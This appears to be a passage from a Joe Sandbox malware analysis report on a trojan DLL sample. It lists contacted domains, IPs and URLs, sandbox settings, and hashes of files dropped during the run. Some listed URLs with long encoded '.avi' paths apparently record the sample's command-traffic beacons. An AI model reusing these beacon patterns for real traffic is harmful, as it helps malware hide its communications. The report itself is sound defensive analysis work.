                      http://ocsp.sca1b.amazontrust.com/images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg0%Avira URL Cloudsafe
                      https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg0%Avira URL Cloudsafe
                      http://ocsp.sca1b.amazontrust.com/images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      contextual.media.net
                      		2.18.160.23
                      		truefalse
                        		high
                        tls13.taboola.map.fastly.net
                        		151.101.1.44
                        		truefalse
                          		high
                          ocsp.sca1b.amazontrust.com
                          		13.225.29.199
                          		truefalse
                            		high
                            hblg.media.net
                            		2.18.160.23
                            		truefalse
                              		high
                              lg3.media.net
                              		2.18.160.23
                              		truefalse
                                		high
                                btloader.com
                                		104.26.7.139
                                		truefalse
                                  		high
                                  geolocation.onetrust.com
                                  		104.20.185.68
                                  		truefalse
                                    		high
                                    web.vortex.data.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        srtb.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          img.img-taboola.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            cvision.media.net
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://ocsp.sca1b.amazontrust.com/images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avifalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationfalse
                                                		high
                                                http://ocsp.sca1b.amazontrust.com/images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avitrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ocsp.sca1b.amazontrust.com/images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avifalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://btloader.com/tag?o=6208086025961472&upapi=truefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpegfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpegfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.pngfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpegfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ocsp.sca1b.amazontrust.com/images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avifalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpgfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                13.225.29.132
                                                		unknownUnited States
                                                		16509AMAZON-02USfalse
                                                13.225.29.199
                                                		ocsp.sca1b.amazontrust.comUnited States
                                                		16509AMAZON-02USfalse
                                                151.101.1.44
                                                		tls13.taboola.map.fastly.netUnited States
                                                		54113FASTLYUSfalse
                                                104.26.7.139
                                                		btloader.comUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                104.20.185.68
                                                		geolocation.onetrust.comUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                13.225.29.204
                                                		unknownUnited States
                                                		16509AMAZON-02UStrue

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:481107
                                                Start date:10.09.2021
                                                Start time:11:27:12
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 15m 26s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:qT9Qk5aKTk.dll
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:49
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal96.troj.evad.winDLL@64/163@14/7
                                                EGA Information:
                                                • Successful, ratio: 35.3%
                                                HDC Information:
                                                • Successful, ratio: 75.2% (good quality ratio 69.7%)
                                                • Quality average: 76.5%
                                                • Quality standard deviation: 31.2%
                                                HCA Information:
                                                • Successful, ratio: 79%
                                                • Number of executed functions: 181
                                                • Number of non-executed functions: 199
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                • Found application associated with file extension: .dll
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.203.80.193, 204.79.197.203, 204.79.197.200, 13.107.21.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 23.211.4.86, 2.18.160.23, 20.82.210.154, 152.199.19.161, 20.199.120.182, 20.199.120.85, 80.67.82.235, 80.67.82.211, 40.112.88.60, 20.54.110.249
                                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                • Execution Graph export aborted for target rundll32.exe, PID 1268 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 2200 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 4504 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 4620 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 572 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 5852 because it is empty
                                                • Execution Graph export aborted for target rundll32.exe, PID 6272 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 6284 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 6812 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 7040 because there are no executed function
                                                • Execution Graph export aborted for target rundll32.exe, PID 768 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:28:31API Interceptor4x Sleep call for process: rundll32.exe modified
                                                11:28:47API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                11:29:33API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):13
                                                Entropy (8bit):2.469670487371862
                                                Encrypted:false
                                                SSDEEP:3:D90aKb:JFKb
                                                MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <root></root>
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):3138
                                                Entropy (8bit):4.888614068856011
                                                Encrypted:false
                                                SSDEEP:96:xHHHYYyYY/YPPAAAfmAfm4AfYaoaAfYaoaAfYaoaAfYaoaAfYaoaAfYaoaC:sbwbwbwbwbwb9
                                                MD5:CFCCDA8AC311B8CE01C8A9441B112B73
                                                SHA1:5BDCD03F197E1F24694A6FCF86A9898FA7750770
                                                SHA-256:DB5F323043990284F46423C01E8429FBE5D4FDA0D3D5D28306A58B8F6D0FFF72
                                                SHA-512:E63C248727381554450CC29AB0714821ADE625DEB764E4CB8A697328168B98EF912421D5D7C0A6F19FEB70036ABB87FA9DB9F84F75D45A521ACDFE176DBB988A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /><item name="mntest" value="mntest" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /><item name="mntest" value="mntest" ltime="2713725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2718205760" htime="30910065"
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DAC6F608-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):296008
                                                Entropy (8bit):2.5037486162156104
                                                Encrypted:false
                                                SSDEEP:1536:9zdMF6XK6Oc3fbXg+9UcGnvcGP+cGmvcGo+cGogcGeFcGyO/GPjWGTi38WjnJWjb:J0
                                                MD5:231EC8099E85002D67348167DE714EA5
                                                SHA1:EB7519FC839FF80F96C7463E65F0B55ADAD82FA0
                                                SHA-256:37E490A1F748A6148BABE11B6FB646C764757825BB465A999B202D81FFA3E898
                                                SHA-512:CE777CDC5BA6212CA94EB6C8B1DAA41EF0657132E68D794AF9E37BA1B69675FDC50EF628FF2C0C2FF95AB67EB8DDB937220E9187B1BD9E03F0768DAD8EE3D2AC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{076F5B62-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5977867449096077
                                                Encrypted:false
                                                SSDEEP:48:Iw3GcpraGwpamG4pQ2GrapbSSGQpBOGHHpc3TGUpQA8Gcpm:r9ZCQW64BS6jd2B69g
                                                MD5:E39371B263D40222CB8C7DE0B31AD051
                                                SHA1:D93EBEEFA948AB246EB9ADF571A17EB364F08279
                                                SHA-256:94A3220C626A05F13FC0665DFAF87D5386B44904992CF69A63641BA311CF0015
                                                SHA-512:7BAA0A92BB4BF9720E0BD7639272CB909E5B843DF38BBC9FB03E68A7BEF6852F94C2EB5678A3782584C599CB01FE4224F1931AA99FB616B675E5AA4943C3E583
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{076F5B64-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.598293055303183
                                                Encrypted:false
                                                SSDEEP:48:IwjhGcprcGwpaUhG4pQsGrapbSiGQpBmJtGHHpcmD6TGUpQmgpGcpm:rjXZUQUz6qBSqj12V6Zg
                                                MD5:5D11AD3A7201B43E41525F6896FBF926
                                                SHA1:C7CDB43F741201FDEBB833099BFF8EF189DAB609
                                                SHA-256:C542F69A0BDF09C75FAF25B67C89FA0A2E9ABEC823059CF8F162F1343C6167A6
                                                SHA-512:6000CAF7126FC9E79ADC6706B08CC1E95CE8CA7D0B208321D11B267B3B28A55065C25E3DBDBC756B95D11BE12F20ED6300701030F30CD607AE172E8FE52D5041
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0E8F68A2-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27440
                                                Entropy (8bit):1.8671435729814179
                                                Encrypted:false
                                                SSDEEP:192:rsZrQn6JkYjZ2pWUMQ6VaMfxixVaMfxraqA:rsE6aaoYB3bfMbf0
                                                MD5:FD8E0DE629076D9DA76C48C0E84667B8
                                                SHA1:28B2E380BC44EBF18EF854F861797D0B1487AFF4
                                                SHA-256:FB39703A2DD64EED876636759F70AE69A07CDBBFF458C341EF739BFA1C56AED0
                                                SHA-512:D89427EAC9C63EBD4B3C9C247EE5F305C7E9C4B1CDC12CC2309BCCB75320467B0CB592BA8794815E912A6DF70AA1450660F438124BC9FC09B751AA191BE17A27
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{151808E6-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5968160088475212
                                                Encrypted:false
                                                SSDEEP:48:IwTGcprSGwpaCG4pQWGrapbShGQpBSGHHpcjTGUpQQiGcpm:rpZaQy6YBSbjp2963g
                                                MD5:C1F0A186B1A7ADE0C910735B8D68E882
                                                SHA1:9356083234713F03EC78580F10B01D050184F7ED
                                                SHA-256:9630985C894A6002FCAA800082603214E17C8394F822A20C31E8080956E08BF2
                                                SHA-512:61F027181149C62CE5381FB09711DD7164C61852F70C35314070B2E7436E7EDDF5851DDCAE90F761BEDB7292EF8A76CDFA807BEF5E227733E4A4B9F811BDF5BF
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{23EFE27C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:modified
                                                Size (bytes):19032
                                                Entropy (8bit):1.597992830495361
                                                Encrypted:false
                                                SSDEEP:48:IwSGcprjGwpa50G4pQnmGrapbSquGQpBCy6GHHpcCgNTGUpQC/6Gcpm:rmZ9Qa6oBSqmjCyB2CgP6COg
                                                MD5:2EFDCCE8EB07B401729B576B48DE39E7
                                                SHA1:277073E7DB5B9155AFF6FEC63C11BA4348426E3C
                                                SHA-256:36FAE8174ADDB0CF62C238514E0952CB33BE8BEA15C06F6970F6FB48B7A66826
                                                SHA-512:D958342DE6A40E1BAEBE549850169DD2C46A4886C28A1B8D3CAD7DA6AFC4877EB085E9E61479084DB14E99A10C89EE242D44A293BE8F2ADBDA349E1185FA2351
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DAC6F60A-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):198318
                                                Entropy (8bit):3.58429359179131
                                                Encrypted:false
                                                SSDEEP:3072:9Z/2Bfcdmu5kgTzGtLZ/2Bfc+mu5kgTzGtu:kIf
                                                MD5:361933F3665EE5C0406FE843330895A5
                                                SHA1:6A5D7038AC7E59FCA0D3A38EED059091EBA20709
                                                SHA-256:F4D15BB8C9B7275E7FEAEB866BCD317E68F1F9DFA612E2AC27095818817CC647
                                                SHA-512:A1EEAE17D1F56EA120C6334D349F7496E2DEE16A70F7E3112A5DB945AF1C7D6DD1D8D50539D9675CF326C1E9F282092AB12EB64CA2876FB0A89AEB7A86FA02D7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1E23B56-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5836752086615293
                                                Encrypted:false
                                                SSDEEP:48:IwPGcprKGwpa3G4pQfGrapbSBGQpK/G7HpRecTGIpX29GApm:rFZSQ56jBS7AOTXFcg
                                                MD5:A06F23434238FAC16C854BC853569D20
                                                SHA1:615776BB7BCD79A4D446C559FAFBBF0F1228C9AF
                                                SHA-256:FBCAF2B9B584CFFEE987204269B5FE4B36D4C96515C7EC2CC12559ACF7133DF4
                                                SHA-512:625D7C2F8B40109A190A0CC45A3A2852173A6C517D8167CB147FFA3F31C97E210E5E77A384D68B829286104E6065C4C701B65ECC176B329D965CE1771E642227
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EA368F0D-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):24700
                                                Entropy (8bit):1.7419865277306803
                                                Encrypted:false
                                                SSDEEP:48:Iw6GcprrGwparG4pQfGrapbSfGQpBuGHHpc7TGUp8duGzYpmpMtGopMDEJhvgo8M:r+ZlQt6jBSJj92VWdCM+fOcqzLg
                                                MD5:6D9D817E4753D44623AC4D2882A70FDC
                                                SHA1:D0A22ACB7FD1FF8D765759685BCB2395FC58849E
                                                SHA-256:5BF84FC7364A498BD56B7C0ECCEE99689EEFE6727F11B55880538BAFB99441C4
                                                SHA-512:E4211E6C16C526DDF85ECAEDCAA4364FD9E3B43A7B583B5BFDF88EB32C242F52FDA06F16F0DB36801B133E44379AA692BE87E0A7C8960BF51E04409C9BBB4674
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1137908-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27376
                                                Entropy (8bit):1.847563322290461
                                                Encrypted:false
                                                SSDEEP:96:rTZUQA6uBSAjd2pWTMT6Xzwcz56xXzwcz50zwccA:rTZUQA6ukAjd2pWTMT6k3xky7A
                                                MD5:C0BF9BA0FE9BBD40D20CE1AA29C8BF70
                                                SHA1:5DCFC2224767B65C1B8E2BF5354F59DCC1998F87
                                                SHA-256:C51BD3B9A28DBF457CA97288CE09F276276AF176B0CE330213EE21E7C7827227
                                                SHA-512:907388B483EBCB555950DE53475B15077DBB468CC9F2D4D111B0CAB2DFB7B5060F050E2CA8B9B73963F2CA9C44CA685EBC3F4AFF5ABD9F249819A04F97D176F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F113790A-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27448
                                                Entropy (8bit):1.8706165986701966
                                                Encrypted:false
